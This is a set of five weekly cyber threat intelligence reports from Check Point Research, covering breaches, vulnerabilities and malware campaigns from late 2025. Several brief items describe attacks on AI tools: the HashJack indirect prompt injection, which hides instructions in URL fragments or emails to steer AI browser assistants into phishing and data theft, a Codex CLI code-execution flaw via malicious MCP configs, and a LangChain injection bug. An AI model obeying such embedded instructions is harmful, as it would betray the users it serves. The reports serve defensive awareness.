For the latest discoveries in cyber research for the week of 29th December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• Romanian Waters, the country’s national water management authority, was hit by a ransomware attack that resulted in nearly 1,000 computer systems across national and regional offices being encrypted. The attack affected geographic information systems, databases, email, web servers, and Windows workstations. Operational technology controlling water infrastructure was not impacted, and no data leakage has been reported, but key IT services were disrupted across the organization.
• France’s postal service La Poste has suffered a cyber-attack that disrupted key digital systems, impacting online parcel tracking, mail distribution, and banking services for customers of both the postal service and La Banque Postale. Some services were temporarily unavailable, with no evidence of data compromise. The attack was claimed by the pro-Russian hacktivist group NoName057(16).
• Insurance giant Aflac has confirmed a data breach they experienced in June that resulted in the theft of sensitive files containing insurance claims, health data and Social Security numbers. The breach affected personal details of approximately 22.7 million individuals in its US business. The attack has been attributed to Scattered Spider threat group.

Check Point Harmony Endpoint provides protection against this threat.

• Japan’s leading carmaker Nissan Motor Corporation has acknowledged a data breach that resulted in the exposure of personal information for approximately 21,000 customers from Nissan Fukuoka Sales Corporation including names, addresses, phone numbers, email addresses, and sales operation data. The incident occurred after unauthorized access to Red Hat data servers led to the leak, but financial data was not affected. The Crimson Collective threat actor claimed responsibility for the initial breach, with ShinyHunters later hosting samples of the stolen data.
• Trust Wallet, a popular non-custodial cryptocurrency wallet, has disclosed a cyber-attack involving a compromised Chrome extension update. The attack exfiltrated sensitive wallet data, including seed phrases, to a malicious domain, resulting in at least $7 million in losses. The incident primarily affected users of Chrome extension version 2.68.0, allowing attackers to drain wallets.
• Ubisoft’s live service game Rainbow Six Siege (R6) has confirmed a cyber-attack in which threat actors abused internal systems to manipulate bans, unlock all cosmetics and developer-only skins, and distribute around $13.33 million worth of in-game currency worldwide.
• Baker University has encountered a data breach that resulted in attackers accessing its network and stealing sensitive information belongs to 53,624 students, alumni, staff, and affiliates of the university, such as names, Social Security numbers, financial account details, and medical records.

VULNERABILITIES AND PATCHES

• A high-severity memory-read vulnerability, CVE-2025-14847, dubbed “MongoBleed” has been identified in multiple MongoDB Server versions, allowing unauthenticated remote attackers to exploit a zlib implementation flaw and potentially access uninitialized heap memory. The issue, caused by improper handling of length parameter inconsistency (CWE-130), may permit arbitrary code execution and system compromise. Affected versions include MongoDB 4.0 through 8.2.3.
• Details on a critical serialization injection vulnerability in LangChain Core were disclosed. CVE-2025-68664 (CVSS 9.3) affects langchain-core, where unescaped user-controlled dictionaries with lc keys are treated as trusted objects during deserialization, enabling secret extraction, prompt injection, and potentially arbitrary code execution.
• A critical buffer overflow vulnerability, CVE-2025-68615, in Net-SNMP’s snmptrapd daemon can be triggered remotely via a specially crafted packet. The issue has a CVSS score of 9.8 and may allow unauthenticated attackers to achieve remote code execution or cause service crashes. Patches are available, and the vulnerability is addressed in Net-SNMP versions 5.9.5 and 5.10.pre2.

THREAT INTELLIGENCE REPORTS

• Check Point researchers describe a phishing campaign in which attackers abused Google Cloud Application Integration’s “Send Email” workflow to send over 9,000 spoofed Google notification emails from a Google address. The messages targeted manufacturing, technology, and finance sectors and used multi-step redirection through Google domains to lead victims to a Microsoft-themed credential harvesting site. Most victims located in the US, Asia-Pacific, and Europe.
• Researchers uncovered a two-year Evasive Panda campaign using adversary-in-the-middle DNS poisoning to deliver MgBot via fake updaters and stealthy loaders. The chain used multi-stage shellcode, hybrid encryption, and DLL sideloading to run MgBot in memory, with victim-specific payloads tied to machines via DPAPI and RC5. Attackers poisoned legitimate domains, injected into signed system processes for persistence, and updated configs with hardcoded C2s.

Check Point Harmony Endpoint provides protection against this threat (Infostealer.Win.MgBot)

• A Webrat campaign leveraged fake GitHub repositories masquerading as exploit and proof-of-concept code for high-severity CVEs, targeting gamers, students, and inexperienced security researchers. The attack uses droppers to elevate privileges, disable Windows Defender, and deploy the Webrat backdoor, enabling remote control, credential theft, keylogging, and device surveillance.
• Researchers found lotusbail, a malicious npm package masquerading as a WhatsApp Web API library that intercepts messages and steals session/auth data, contacts, and media via WebSocket tampering and device-pairing hijack. Separately, 14 malicious NuGet packages were found redirecting crypto funds and stealing Google Ads OAuth tokens.

The post 29th December – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 22nd December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• An adult content platform PornHub has disclosed a data breach linked to analytics provider Mixpanel. The breach exposed more than 200 million records related to Premium users, including email addresses, search, watch, and download histories, locations, and associated video details collected prior to 2021. Pornhub stated that no passwords, payment information, or government-issued IDs were compromised. OpenAI also acknowledged a related incident that was caused by compromise of Mixpanel. The breach has been attributed to the ShinyHunters extortion group.
• SoundCloud, an online audio streaming platform, has confirmed a cyber attack that resulted in threat actors gaining unauthorized access to a database containing users’ email addresses and public profile information. The breach affected approximately 20% of SoundCloud’s users, which might impact 28 million accounts, and caused outages and VPN connection issues. The ShinyHunters extortion gang has claimed responsibility for this attack.
• Autoparts giant LKQ has acknowledged a cyberattack tied to the Oracle E-Business Suite compromise. The company said personal data of over 9,070 people, including Employer Identification Numbers and Social Security numbers, was exposed.

Check Point IPS provides protection against this threat (Oracle Multiple Products Remote Code Execution)

• DXS International, a British NHS technology supplier, has encountered a cyber-attack on December 14^th that resulted in unauthorized access to its internal office servers, affecting internal systems but not disrupting clinical services. It remains unclear whether NHS patient data was compromised.
• The University of Sydney has suffered a data breach that resulted in hackers gaining access to an online coding repository and stealing files containing personal information of staff and students. Over 27,000 individuals were affected, including names, dates of birth, phone numbers, home addresses, and job details for current and former staff, students, alumni, and affiliates.
• Petróleos de Venezuela (PDVSA), Venezuela’s state oil company, has experienced a cyberattack that resulted in disruptions to its export operations and offline systems managing the country’s main crude terminal. The incident affected administrative and operational network systems, leading to a halt in cargo deliveries. The scope of data or user information compromised has not been disclosed.
• Denmark’s water utility has experienced a cyber attack that resulted in a disruption of critical water infrastructure systems. The attack impacted operational control systems supporting essential services, forming part of a broader campaign of attacks targeting Denmark’s critical infrastructure and electoral environment. The Danish Defence Intelligence Service attributed the incident to the Russia affiliated group Z-Pentest.

VULNERABILITIES AND PATCHES

• Critical severity vulnerability with a CVSS score of 10.0 was disclosed in HPE OneView Software. The flaw, CVE-2025-37164, allows unauthenticated remote code execution and affects all versions prior to 11.00, including versions 5.20 through 10.20. Successful exploitation could enable a remote attacker to execute arbitrary code on affected centralized IT infrastructure management systems.

Check Point IPS provides protection against this threat (HPE OneView Remote Code Execution (CVE-2025-37164))

• A critical remote code execution vulnerability, CVE-2025-14733, in WatchGuard Firebox firewalls running Fireware OS 11.x and later is being actively exploited. The out-of-bounds write flaw enables unauthenticated remote code execution on unpatched devices with IKEv2, without user interaction.
• Researchers spotted active exploitation of CVE-2025-59718 and CVE-2025-59719, critical authentication bypass flaws in Fortinet FortiGate, FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager. Attackers can log in without credentials and export full device configurations, risking cracked passwords.

THREAT INTELLIGENCE REPORTS

• Check Point Research revealed a sophisticated wave of attacks attributed to the Chinese threat actor Ink Dragon, which targets European governments while continuing campaigns in Southeast Asia and South America. The threat actor converts compromised IIS servers into relay nodes with ShadowPad, exploits predictable configuration keys for access, and deploys a new FinalDraft backdoor for exfiltration and lateral movement.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

• Check Point Research analyzed GachiLoader, a Node.js–based malware loader observed in a campaign linked to the YouTube Ghost Network. The campaign is notable for extensive obfuscation and a previously undocumented PE injection technique. GachiLoader deploys a second-stage loader, Kidkadi, which abuses Vectored Exception Handling (VEH) in a novel method, dubbed Vectored Overloading, to load its malicious payload.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

• Check Point Research noticed a surge in darknet campaigns recruiting insiders at banks, crypto exchanges, telecoms, and major tech firms to sell access and data. Listings advertise payouts of $3,000 to $15,000, offer datasets like 37 million records for $25,000, and solicit telecom staff for SIM swapping to bypass two-factor authentication.
• Check Point researchers updated on a global surge in AI-driven holiday scams across phishing, fake retail sites, and social media giveaways. They recorded 33,502 phishing emails in two weeks and over 10,000 daily ads impersonating delivery brands like Royal Mail, FedEx, UPS and DPD, while AI chatbots help fraudulent stores appear credible.

The post 22nd December – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 8th December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• The University of Pennsylvania and the University of Phoenix were hit by data breaches after attackers exploited zero-day vulnerabilities in Oracle E-Business Suite servers. At least 1,488 people at UPenn and numerous students, alumni, donors, staff, faculty, employees, and suppliers at Phoenix were impacted. The Cl0p ransomware gang is likely responsible, as part of a broader campaign.

Check Point IPS, Threat Emulation and Harmony Endpoint provide protection against this threat (Oracle Multiple Products Remote Code Execution; Ransomware.Win.Clop; Ransomware.Wins.Clop; Ransomware.Wins.Clop.ta.*)

• Financial software provider Marquis Software Solutions has disclosed a data breach that impacted over 74 banks and credit unions across the US and exposed sensitive data of more than 400,000 customers. The Akira ransomware gang is possibly responsible for the attack, which exploited vulnerabilities in SonicWall firewalls to gain network access.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Akira.ta.*; Ransomware.Wins.Akira)

• American pharmaceutical firm Inotiv has reported on a ransomware attack that occurred in August 2025. The Qilin ransomware group claimed responsibility, leaking personal information from over 9,500 individuals, including current and former employees and their family members.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

• South Korean retail giant Coupang has confirmed a data breach that resulted in the exposure of personal information belonging to nearly 34 million clients, including full names, phone numbers, email addresses, and more. No payment details or account passwords were leaked in the incident.
• YouTube app for Android TV, SmartTube, has been targeted in an attack that resulted in the compromise of its developer signing keys and the distribution of a malicious update containing hidden malware. The incident impacted Android TV, Fire TV Stick, and similar device users.
• Belgian postal and package delivery service, Bpost, has suffered a data breach that resulted in the exfiltration of 5,140 files totaling about 30.46GB from a third-party exchange platform. The stolen data reportedly includes personal and business information of some customers of the affected department. The ransomware group TridentLocker has claimed responsibility for the attack.
• Canadian wireless telecommunications provider, Freedom Mobile, has experienced a data breach that resulted in attackers gaining unauthorized access to its customer account management platform and stealing personal information, including names, addresses, dates of birth, phone numbers, and account numbers. The company has not disclosed the exact number of affected customers.

VULNERABILITIES AND PATCHES

• Check Point has elaborated on the critical React2Shell vulnerability, CVE-2025-55182, that affects React 19.x and related server-side frameworks such as Next.js 15.x/16.x. The vulnerability enables unauthenticated remote code execution via malicious HTTP requests targeting the server’s decoding process. Exploitation allows attackers to gain full control over application servers, intercept sensitive data, inject false transactions, and potentially pivot deeper into enterprise environments.

Check Point IPS provides protection against this threat (React Server Components Remote Code Execution (CVE-2025-55182))

• Check Point Research revealed a vulnerability in OpenAI Codex CLI that allowed attackers to achieve remote code execution via malicious project-local configuration files (MCP entries) executed without user prompts. OpenAI released a patch in version 0.23.0 to address the automatic execution risk.
• Check Point Research shared details of a critical exploit in Yearn Finance’s yETH pool, where an attacker abused a smart contract flaw to mint trillions of tokens with a minuscule deposit, resulting in the theft of approximately $9 million in assets from the Ethereum-based DeFi protocol.

THREAT INTELLIGENCE REPORTS

• Check Point summarizes a multiyear Salt Typhoon cyber-espionage campaign that compromised 80 telecom providers worldwide and a US state Army National Guard network, chaining SIM-based credential theft, network scans, Ivanti/PAN-OS/Cisco CVEs and GTP/GTPDOOR abuses to exfiltrate sensitive communications and configuration data.
• US and Canadian cybersecurity agencies outlined BRICKSTORM, a stealthy backdoor used by Chinese affiliated hackers to infiltrate VMware vSphere environments and maintain long-term access. The campaign targeted government services and IT, stealing credentials via VM snapshots and creating hidden machines.
• The ShadyPanda threat actor ran a seven-year campaign weaponizing verified Chrome and Edge extensions to infect over 4.3 million devices with spyware for remote code execution, payload delivery, traffic redirection, credential and cookie theft, browser fingerprinting, HTTPS credential interception, and behavioral biometrics exfiltration.
• Researchers identified a campaign weaponizing Velociraptor, a digital forensics tool, to establish stealthy command channels and maintain persistence in enterprise environments. Attackers exploited SharePoint’s “ToolShell” chain using CVE-2025-49706 and CVE-2025-49704, linked to Storm-2603, and in confirmed cases delivered Warlock ransomware.
• Albiriox, a new Android banking trojan sold as Malware-as-a-Service (MaaS), targets over 400 financial and crypto apps using VNC-style remote control, accessibility abuse, overlays, and black-screen masking for on-device fraud. The malware is spread via smishing, WhatsApp lures, and fake apps with droppers over unencrypted TCP C2 channels using structured JSON messages.

The post 8th December – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 1st December, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• OpenAI has experienced a data breach resulting from a compromise at third-party analytics provider Mixpanel, which exposed limited information of some ChatGPT API clients. The leaked data includes names, email addresses, approximate location, operating system, browser information, referring websites, and organization or user IDs. No sensitive credentials or API keys were exposed.
• Dartmouth College, a private Ivy League research university in New Hampshire, has been a victim of a data breach that resulted in the theft of personal information, including names, Social Security numbers and financial details, from its Oracle E-Business Suite servers. The Cl0p extortion gang was responsible for exploiting zero-day vulnerability as part of a broader campaign. Other targets include Harvard University, Envoy Air, and others with sensitive data exposed via dark web and torrent sites.

Check Point IPS, Threat Emulation and Harmony Endpoint provide protection against this threat (Oracle Concurrent Processing Remote Code Execution; Ransomware.Win.Clop; Ransomware.Wins.Clop; Ransomware.Wins.Clop.ta.*)

• Crisis24, a leader in crisis and risk management, was hit by a cyberattack on its OnSolve CodeRED emergency alert platform that resulted in widespread disruption of notification systems nationwide and the theft of user data. Leaked information including names, addresses, email addresses, phone numbers, and clear-text passwords affecting state and local governments, public safety agencies, and residents across the US. The INC Ransomware gang has claimed responsibility for the attack and is offering stolen data for sale.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.INC)

• Major American investment advisory provider SitusAMC has confirmed a data breach that resulted in the compromise of corporate data associated with client relationships, including accounting records, legal agreements, and potentially customer data. The breach impacted an undisclosed number of clients and customers, likely including largest banks and financial institutions in the US, with no information yet provided on the amount or exact type of data leaked.
• A Russian postal operator Donbas Post has encountered a cyber-attack that disrupted its corporate network, web platform, and email systems, destroying over 1,000 workstations, 100 virtual machines, and several dozen terabytes of data, and forcing the suspension of services at postal branches and the call center. The Ukrainian Cyber Alliance has claimed responsibility.
• The French Football Federation (FFF) has suffered a data breach that resulted in unauthorized access to administrative management software and theft of personal and contact information from members of French football clubs. Exposed data includes names, email addresses, and more.

VULNERABILITIES AND PATCHES

• A new Mirai-based botnet, ShadowV2, was observed exploiting multiple known vulnerabilities (including CVE-2024-10914, CVE-2024-10915, and CVE-2024-53375) in IoT devices to gain control and launch distributed denial-of-service (DDoS) attacks. The botnet leveraged command injection and other flaws in routers, NAS devices, and DVRs across global sectors.

Check Point IPS provides protection against this threat (D-Link DNS NAS Devices Command Injection (CVE-2024-10914); D-Link DNS Series Command Injection; TP-Link Archer AXE75 Command Injection (CVE-2024-53375))

• Security researcher uncovered more than 17,000 exposed credentials during a scan of 5.6 million public GitLab repositories, including API keys, passwords, and access tokens associated with over 2,800 domains. Many of these credentials – primarily Google Cloud, MongoDB, Telegram, and OpenAI keys – remain active. While most were leaked after 2018, some valid keys date back to 2009.
• A patch was released for a critical authentication bypass vulnerability (CVE-2025-59366) in ASUS routers with AiCloud enabled, which allows remote attackers to exploit chained path traversal and OS command injection flaws for unauthorized function execution. Successful exploitation does not require user interaction and could result in attackers gaining control over vulnerable devices.

THREAT INTELLIGENCE REPORTS

• Check Point researchers analyzed the Shai-Hulud 2.0 npm supply chain campaign that compromised over 600 npm packages and 25,000 GitHub repositories. Malicious preinstall scripts stole developer and multi-cloud credentials, exfiltrated them to attacker GitHub repos, registered infected hosts as self-hosted runners, and used the stolen tokens for worm-like propagation across npm and GitHub.

Check Point Threat Emulation provides protection against this threat (Trojan.Wins.ShaiHulud.ta.*)

• Check Point researchers uncovered GhostAd, a large-scale Android adware campaign where at least 15 Google Play applications with millions of installs abuse foreground services, blank notifications, JobScheduler, and ad SDKs to run persistent background ads and drain device resources. These applications also use background execution and storage permissions to persist, hide, and silently exfiltrate external-storage files, including corporate documents, to attacker infrastructure.
• Check Point overviews expected cyber risks at 2026, including converging agentic AI, quantum computing, and Web 4.0. The blog outlines 12 trends: autonomous AI operations, digital-twin/XR environments, LLM-native attacks, deepfake fraud, quantum “harvest-now, decrypt-later” exposure, data-pressure ransomware, expanding supply-chain, SaaS, and identity threats.
• Researchers detailed HashJack, an indirect prompt injection technique that embeds malicious instructions in elements like URL fragments or emails to manipulate AI browser assistants – including Comet, Copilot for Edge, and Gemini for Chrome. This method enables threat actors to trigger phishing, misinformation, data exfiltration, and credential theft, exploiting LLMs’ inability to distinguish instructions from legitimate data.

The post 1st December – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 24th November, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• The notorious “Scattered LAPSUS$ Hunters” group claimed responsibility for a supply-chain attack involving the Salesforce-integrated platform Gainsight. The group stated that data from 300 organizations was compromised, including Verizon, GitLab and Atlassian. Salesforce has confirmed unusual activity related to Gainsight integrations and has revoked all active access tokens as a precaution, emphasizing there is no vulnerability in the Salesforce’s core platform.
• Eurofiber France SAS, the French unit of Dutch telecommunications provider Eurofiber Group N.V., has been a victim of a data breach. The attack resulted in an unauthorized access to its French ticket management system and exfiltration of customer information from its cloud division and regional sub-brands. A threat actor “ByteToBreach” claimed responsibility for the attack.
• Italian IT provider Almaviva has confirmed a cyberattack, with stolen data including information from Ferrovie dello Stato Italiane, Italy’s national railway operator. Nearly 2.3 TB of sensitive files were leaked, including passenger passport data, employee records across FS subsidiaries, defense-related contracts, and financial documents. Almaviva says critical services remain operational.
• South Korean giant battery maker LG Energy Solution has experienced a ransomware attack at a single overseas facility, which the company says has been restored, with headquarters unaffected. The Akira gang claimed to have stolen 1.7 terabytes of data.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Wins.Akira.ta.*; Ransomware.Wins.Akira; Trojan.Win.Akira)

• Microsoft’s Azure cloud was hit by a massive 15.72 Tbps distributed denial-of-service (DDoS) attack (3.64 billion packets per second) against a public IP address in Australia, sourced from over 500,000 IPs. The high-rate UDP flood is attributed to the Aisuru Turbo Mirai-class IoT botnet, which abuses compromised home routers, cameras, and other internet-connected devices.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Trojan.Wins.Mirai)

• French social security service provider, Pajemploi, has suffered a data breach that resulted in the theft of personal data linked to up to 1.2 million of private employers using its childcare services. Exposed information reportedly includes full names, places of birth, postal addresses, Social Security numbers, Pajemploi and accreditation numbers, and banking institution names.
• AIPAC, a US political advocacy organization, has encountered a data breach tied to an external third-party system, with notification filed to the Maine attorney general on November 14^th. Unauthorized access occurred between October 2024 and February 2025, impacting 810 individuals and exposing personal identifiers. No threat actor claimed responsibility.

VULNERABILITIES AND PATCHES

• Fortinet warned of CVE-2025-58034, a FortiWeb command injection flaw actively exploited in the wild. The bug lets authenticated attackers run unauthorized code via crafted requests, with updates available for multiple 7.x and 8.x releases.

Check Point IPS provides protection against this threat (Fortinet FortiWeb Command Injection (CVE-2025-58034))

• Google fixed CVE-2025-13223, a high-severity type confusion flaw in Chrome’s V8 engine. The bug is being actively exploited to run malicious code via crafted web pages. Google has issued fixes in Chrome 142.0.7444.175 and later.
• Researchers warns of active exploitation and a public proof of concept of CVE-2025-11001, a 7-Zip Windows vulnerability that lets attackers run code by abusing ZIP symbolic link handling. The flaw carries a CVSS 7.0 score and was fixed in 7-Zip version 25.00.

THREAT INTELLIGENCE REPORTS

• Check Point Research uncovered a surge in fraudulent Black Friday domains and brand impersonation. Roughly 1 in 11 new Black Friday domains are malicious, and 1 in 25 domains referencing Amazon, AliExpress, or Alibaba pose active threats, with fake storefronts stealing credentials and payment data. Recent examples also mimic HOKA and AliExpress.
• Check Point researchers detailed a Europe-wide scam in which criminal networks use generative AI to impersonate health regulators and sell fake GLP-1 weight-loss products. The criminals clone logos and endorsements from the official health services, then localize persuasive ads to exploit drug shortages and public trust.
• Akamai discovered a RAT that disguises its C2 traffic as LLM chat completions API requests, sending Base64- and XOR-encoded payloads without standard headers. The malware steals data from remote access tools and browsers and deploys a .NET proxy toolkit with persistence.
• Researchers analyzed a Howling Scorpius campaign that used fake CAPTCHA prompts to install SectopRAT on a global data storage and infrastructure company, enabling remote control and lateral movement. Over 42 days, the attackers stole nearly 1 TB of data, deleted cloud backups, and deployed Akira ransomware across three networks, halting operations.
• Google analyzed a nearly three-year APT24 cyber-espionage campaign centered on the BadAudio C++ downloader, which uses AES-encrypted C2 traffic, cookie-embedded host profiling, and control-flow flattening to deploy payloads such as Cobalt Strike Beacon in memory. The research details how APT24 shifted from strategic web compromises to large-scale supply-chain and spear-phishing operations that weaponize FingerprintJS-based browser fingerprinting, DLL search-order hijacking, and repeatedly re-compromised Taiwanese marketing infrastructure to deliver BADAUDIO across more than 1,000 domains.

The post 24th November – Threat Intelligence Report appeared first on Check Point Research.